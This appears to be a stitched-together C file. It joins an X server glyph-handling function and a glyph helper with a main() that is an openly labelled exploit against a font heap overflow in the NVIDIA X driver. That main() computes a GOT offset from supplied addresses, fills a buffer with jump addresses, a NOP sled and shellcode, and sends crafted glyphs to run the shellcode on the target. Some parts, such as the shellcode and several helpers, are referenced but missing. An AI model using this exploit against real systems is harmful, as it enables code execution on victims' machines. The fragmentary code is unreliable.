/** Add glyphs to the Glyph Set on each screen. */
static int
dmxProcRenderAddGlyphs(ClientPtr client)
{
int ret;
REQUEST(xRenderAddGlyphsReq);
ret = dmxSaveRenderVector[stuff->renderReqType] (client);
if (ret == Success) {
GlyphSetPtr glyphSet;
dmxGlyphPrivPtr glyphPriv;
int i;
int nglyphs;
CARD32 *gids;
Glyph *gidsCopy;
xGlyphInfo *gi;
CARD8 *bits;
int nbytes;
dixLookupResourceByType((pointer *) &glyphSet,
stuff->glyphset, GlyphSetType,
client, DixReadAccess);
glyphPriv = DMX_GET_GLYPH_PRIV(glyphSet);
nglyphs = stuff->nglyphs;
gids = (CARD32 *) (stuff + 1);
gi = (xGlyphInfo *) (gids + nglyphs);
bits = (CARD8 *) (gi + nglyphs);
nbytes = ((stuff->length << 2) -
sizeof(xRenderAddGlyphsReq) -
(sizeof(CARD32) + sizeof(xGlyphInfo)) * nglyphs);
gidsCopy = malloc(sizeof(*gidsCopy) * nglyphs);
for (i = 0; i < nglyphs; i++)
gidsCopy[i] = gids[i];
/* FIXME: Will this ever fail? */
for (i = 0; i < dmxNumScreens; i++) {
DMXScreenInfo *dmxScreen = &dmxScreens[i];
if (dmxScreen->beDisplay) {
XRenderAddGlyphs(dmxScreen->beDisplay,
glyphPriv->glyphSets[i],
gidsCopy,
(XGlyphInfo *) gi,
nglyphs, (char *) bits, nbytes);
dmxSync(dmxScreen, FALSE);
}
}
free(gidsCopy);
}
return ret;
}
static GlyphSet create_glyphs(Display *dpy, int format_id)
{
#define N_GLYPHS 4
XRenderPictFormat *format;
XGlyphInfo glyph = { 8, 8, 0, 0, 8, 0 };
char image[4*8*8];
GlyphSet glyphset;
Glyph gid;
int image_size;
int bpp;
int n;
format = XRenderFindStandardFormat(dpy, format_id);
if (format == NULL)
return 0;
switch (format_id) {
case PictStandardARGB32:
case PictStandardRGB24:
image_size = 4 * 8 * 8;
bpp = 4;
break;
case PictStandardA8:
case PictStandardA4:
image_size = 8 * 8;
bpp = 1;
break;
case PictStandardA1:
image_size = 8;
bpp = 0;
break;
default:
return 0;
}
glyphset = XRenderCreateGlyphSet(dpy, format);
for (n = 0; n < N_GLYPHS; n++) {
gid = n;
switch (n) {
case 0: render_clear(image, image_size, bpp); break;
case 1: render_black(image, image_size, bpp); break;
case 2: render_green(image, image_size, bpp); break;
case 3: render_white(image, image_size, bpp); break;
}
XRenderAddGlyphs(dpy, glyphset,
&gid, &glyph, 1, image, image_size);
}
return glyphset;
}
int
main(int argc, char *argv[])
{
Display *display;
Widget toplevel;
XtAppContext app_con;
XEvent event;
char c, *string;
unsigned int i;
XDataStr *data;
XExposeEvent *expose = (XExposeEvent *)&event;
unsigned int heapaddr, gotaddr;
if (argc > 2)
{
heapaddr = strtoul(argv[1],NULL,0);
gotaddr = strtoul(argv[2],NULL,0);
}
else
{
printf("Usage: %s <HEAPADDR> <GOTADDR>\n\n", argv[0]);
return 0;
}
toplevel = XtAppInitialize(&app_con, "XSafe", NULL, 0,
&argc, argv, NULL, NULL, 0);
display = XtDisplay(toplevel);
data = (XDataStr *)malloc(sizeof(XDataStr));
if (data == NULL) {
perror("malloc");
exit(EXIT_FAILURE);
}
data->display = display;
data->app = app_con;
if (createWin(data) < 0) {
fprintf(stderr, "can't create Data Window");
exit(EXIT_FAILURE);
}
show(data);
signal(SIGINT, sigHandler);
signal(SIGHUP, sigHandler);
signal(SIGQUIT, sigHandler);
signal(SIGTERM, sigHandler);
/************************************************************************
* BEGIN FONT HEAP OVERFLOW SETUP CODE
*
* "It's so hard to write a graphics driver that open-sourcing it would
* not help."
* - Andrew Fear, Software Product Manager (NVIDIA Corporation).
**********************************************************************/
XGlyphInfo * glyphs;
XRenderPictFormat fmt;
XRenderPictFormat *mask = 0;
GlyphSet gset;
char * buf =0;
int offset, cr, numB;
int xscreenpos = 32680;
int magic_len = 32768 - xscreenpos;
int wr_addr_len = 3548;
int wr_nop_len = 200;
/* Calculate the offset to the Global Offset Table.
* 0x2C0000 is the size of the buffer the NVIDIA driver
* allocates for us when it is about to draw.
*/
offset = gotaddr-(heapaddr-0x2C0000);
offset += magic_len;
glyphs = malloc(sizeof(XGlyphInfo)*3);
/* Payload glyph */
glyphs[0].width = 0x4000; /* One contiguous buffer of 16K... way more than necessary */
glyphs[0].height = 1;
glyphs[0].yOff = 0;
glyphs[0].xOff = glyphs[0].width;
glyphs[0].x = 0;
glyphs[0].y = 0;
/* Large offset glyph (untweaked) */
glyphs[1].width=0;
glyphs[1].height=0;
glyphs[1].yOff=32767;
glyphs[1].xOff=0;
glyphs[1].x = 0;
glyphs[1].y = 0;
/* Small offset glyph (tweaked) */
glyphs[2].width=0;
glyphs[2].height=0;
glyphs[2].yOff=0;
glyphs[2].xOff=0;
glyphs[2].x = 0;
glyphs[2].y = 0;
fmt.type = PictTypeDirect;
fmt.depth = 8;
Glyph * xglyphids = malloc(3*sizeof(Glyph));
xglyphids[0] = 'A';
xglyphids[1] = 'B';
xglyphids[2] = 'C';
int stride = ((glyphs[0].width*1)+3)&~3; /* Needs to be DWORD aligned */
int bufsize = stride*glyphs[0].height;
buf = malloc(bufsize);
/* Write jump address to the buffer a number of times */
for (cr=0; cr<wr_addr_len; cr+=4)
{
*((unsigned int*)((unsigned char*)buf + cr)) = gotaddr+wr_addr_len+4;
}
/* Write the NOP instructions until wr_nop_len */
memset(buf+wr_addr_len, 0x90 /* NOP */, wr_nop_len);
/* Write the shellcode */
cr+=wr_nop_len;
memcpy(buf+cr, shellcode, sizeof(shellcode));
/* Calculate the number of B's required to send */
numB = offset / (glyphs[1].yOff * magic_len);
/* We send only one C, but we change its yOff value according to
* how much space we have left before we meet the correct index length */
glyphs[2].yOff = (offset - (numB * glyphs[1].yOff * magic_len)) / (magic_len);
/* Now create a new buffer for the string data */
string = malloc(numB+1/*numC*/+1/*numA*/+1/*NULL*/);
for (cr=0; cr<numB; cr++) string[cr] = 'B';
string[cr] = 'C'; cr++;
string[cr] = 'A'; cr++;
string[cr] = 0;
mask = XRenderFindFormat(display, PictFormatType|PictFormatDepth, &fmt, 0);
gset = XRenderCreateGlyphSet(display, mask);
if (mask)
{
/* Ask the server to tie the glyphs to the glyphset we created,
* with our addr/nopslide/shellcode buffer as the alpha data.
*/
XRenderAddGlyphs(display, gset, xglyphids, glyphs, 3, buf, bufsize);
}
/* END FONT HEAP OVERFLOW SETUP CODE */
done = 0;
while (!done) {
XNextEvent(display, &event);
switch(event.type) {
case KeyPress:
i = XLookupString(&event.xkey, &c, 1, NULL, NULL);
if ((i == 1) && ((c == 'q') || (c == 'Q'))) {
done = 1;
}
break;
case Expose:
XftDrawRect(data->draw, &data->bg,
expose->x, expose->y,
expose->width, expose->height);
/* Send malignant glyphs and execute shellcode on target */
XRenderCompositeString8(display, PictOpOver,
XftDrawSrcPicture(data->draw, &data->color),
XftDrawPicture(data->draw), mask, gset,
0, 0, xscreenpos, 0, string, strlen(string));
break;
}
}
free(glyphs);
free(xglyphids);
free(buf);
free(string);
XFlush(display);
XUnmapWindow(data->display, data->win);
XUngrabKeyboard(data->display, CurrentTime);
XCloseDisplay(display);
exit(EXIT_SUCCESS);
}
